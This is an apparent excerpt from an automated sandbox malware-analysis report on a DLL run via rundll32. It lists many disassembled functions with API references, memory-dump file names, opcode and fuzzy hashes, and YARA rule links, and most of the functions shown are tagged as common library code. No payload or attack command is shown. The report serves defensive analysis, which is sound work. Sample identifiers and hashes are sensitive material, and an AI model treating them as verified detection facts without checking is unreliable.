                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004198B
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004199C
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 00000001800419B7
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                      • Opcode ID: 06c95a4aa1771613fd3935f9b6fa3d2226365f91a529870d9feca7c030eab943
                                                                                                                                                                                                                                                                      • Instruction ID: a236a635390231764599b441ca33359ecfb18b4257108ec610f8a3aa5a970b1f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06c95a4aa1771613fd3935f9b6fa3d2226365f91a529870d9feca7c030eab943
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01118E30204E4846F6D6632155A53FD5242BB4C7F9F15C724F876177C6EE288B095749
                                                                                                                                                                                                                                                                      Function 0000000180016F68 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-757766384
                                                                                                                                                                                                                                                                      • Opcode ID: 037b52de5d520ae03becac24376554bd3a1233cb3c82c6952893d7c61cf1fdce
                                                                                                                                                                                                                                                                      • Instruction ID: 4038f050409aa154ac6b01109c2d1ae91dabd18faee6e66f8a741a0bb842cd02
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 037b52de5d520ae03becac24376554bd3a1233cb3c82c6952893d7c61cf1fdce
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2716A76701B4898EB968F68D8503EC66B5B30D7C4F94C529FA5907BA6DF39C3A8C340
                                                                                                                                                                                                                                                                      Function 0000000180018CB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 89COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::
                                                                                                                                                                                                                                                                      • String ID: `template-parameter$void
                                                                                                                                                                                                                                                                      • API String ID: 1333004437-4057429177
                                                                                                                                                                                                                                                                      • Opcode ID: 0be1fb5e2f1216bc1b940a859d571dac6121c46e0836de7767b4ce6883e4aeb3
                                                                                                                                                                                                                                                                      • Instruction ID: 6b3cef5dec8401bd2ebba64d188ad0518e1c0495917126e62d011a98b4116422
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0be1fb5e2f1216bc1b940a859d571dac6121c46e0836de7767b4ce6883e4aeb3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5414D32700F5888FB92CBA4E8513ED2371BB5C7C8F959125EE092BB95DF78864AC340
                                                                                                                                                                                                                                                                      Function 000000018000F874 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                                                                      • Opcode ID: 220969f90f81ea5a491faac75346ba19894adf6be773f5f6384549e35cdde0f7
                                                                                                                                                                                                                                                                      • Instruction ID: 5e4ab2c16c99f6d0b16bc80479f9834d0d63f7ea8ea22c137d887cbb2cd0e6bc
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 220969f90f81ea5a491faac75346ba19894adf6be773f5f6384549e35cdde0f7
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0217131212A0591EEA6CB56A4007B97294BB4CBF0F59C735BE2957BD5EF38CA499300
                                                                                                                                                                                                                                                                      Function 000000018000FABC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60libraryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                                                                      • Opcode ID: a289e550c52b847aac57570cc03b00b5a0ebd41078ac3d3d573d834e8681df30
                                                                                                                                                                                                                                                                      • Instruction ID: a95981d2bde028957cb7d6165ac678c66b686b579846189090f2e31615455093
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a289e550c52b847aac57570cc03b00b5a0ebd41078ac3d3d573d834e8681df30
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7218E32215B4881EAA6DB5694103B533A4EB8CFF0F5C9335AE2987BD0DF38C6098740
                                                                                                                                                                                                                                                                      Function 000000018003FF44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                      • Opcode ID: 30848afdadcb297948af538131b5f5178555a04d7eb4f77c05f8b310286a30c0
                                                                                                                                                                                                                                                                      • Instruction ID: c7829849b2f168159db765faf0b81d1f3368c8563c0f8ad31c6079f03d2a3549
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30848afdadcb297948af538131b5f5178555a04d7eb4f77c05f8b310286a30c0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24F06271211B0881EBA28B24E8443BB6360AB4D7E1F648725FA69463E4CF6EC24D8700
                                                                                                                                                                                                                                                                      Function 0000000180007930 Relevance: 7.8, APIs: 5, Instructions: 326threadCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                                                                                                                      • Opcode ID: 22161daed3c2e48cfb6a2128a24651a7aeaf3e7c08b61552abfb125deb73946f
                                                                                                                                                                                                                                                                      • Instruction ID: 3c6318098b6a105b45b44d24200d3ea19cec9be78bcf65ec60f6a028176840a5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22161daed3c2e48cfb6a2128a24651a7aeaf3e7c08b61552abfb125deb73946f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2602CB32619B8486E7A1CB55E4947AAB7B0F3D8794F108016FACE47BA9DF7DC548CB00
                                                                                                                                                                                                                                                                      Function 000000018000C1F8 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                      • Opcode ID: b7f25e227ec73591775f402b439beda8c2004b6fb1d37a0a7765b10afffff269
                                                                                                                                                                                                                                                                      • Instruction ID: 135fc376b1a8cfedf6fd7dae04e6b903f416e55d44e7b02af783c7e71b4be7be
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7f25e227ec73591775f402b439beda8c2004b6fb1d37a0a7765b10afffff269
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26B19332216A4881EAE7DB559480BFD77A0EB5CBC4F09C426BE4A47785DF38C74AC742
                                                                                                                                                                                                                                                                      Function 00000001800152B4 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::$Name::operator+
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 826178784-0
                                                                                                                                                                                                                                                                      • Opcode ID: 157e1aa60b488d9254f56a5c3751a730c19624724a7ec1fbf038d5f98596ec9c
                                                                                                                                                                                                                                                                      • Instruction ID: dc3e5c478041bf289d860fee317c83415d36c744b4e48cd64d64fa13d1e4a70b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 157e1aa60b488d9254f56a5c3751a730c19624724a7ec1fbf038d5f98596ec9c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77416B36201E58D8EB92CB61E8903EC37B4B719BC5FA48016EAA95B395DF75C759C300
                                                                                                                                                                                                                                                                      Function 00000001800419D0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 00000001800419EF
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A0E
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A36
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A47
                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A58
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                      • Opcode ID: 157056b5f07e6d5b21f7a52ee4ede94ab6a34c5cf7ed9480ed3c8b7af57ff7d6
                                                                                                                                                                                                                                                                      • Instruction ID: e93ad22c6cc443ae94773b33ba4779df2cc7973ffbf2f88c150105d93498b686
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 157056b5f07e6d5b21f7a52ee4ede94ab6a34c5cf7ed9480ed3c8b7af57ff7d6
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00118E30205E4845FADA672195D63FD22417B4C7F9F0AC724B83A066D6EE28CB29574A
                                                                                                                                                                                                                                                                      Function 0000000180041520 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                      • Opcode ID: 9832f5b7719f7b86fd8c38624eed4aee1a7210bb3eeaaf95e05a674a0a924b3e
                                                                                                                                                                                                                                                                      • Instruction ID: 894476b8d09a22a5dbe3d770f39793525e4cc36c43d7413f8e4abc8b3aeea73a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9832f5b7719f7b86fd8c38624eed4aee1a7210bb3eeaaf95e05a674a0a924b3e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1115470314E0985FADAA73554E27FD12816B8C7F9F19CB24B936062C6ED38CB486749
                                                                                                                                                                                                                                                                      Function 0000000180041864 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                      • Opcode ID: 830f67e147a0935bcec4e640bc060abaaf3c4469f6951c3d39c6dccd234fcab0
                                                                                                                                                                                                                                                                      • Instruction ID: e86eebddfadbf209218566a74c72582cf7fff1bf59de2877caf13f980550ab1d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 830f67e147a0935bcec4e640bc060abaaf3c4469f6951c3d39c6dccd234fcab0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B113030204E0D09FADB632144A67FD12416F4D3FEF1ACB28B8350A2C2ED389B096799
                                                                                                                                                                                                                                                                      Function 0000000180041480 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
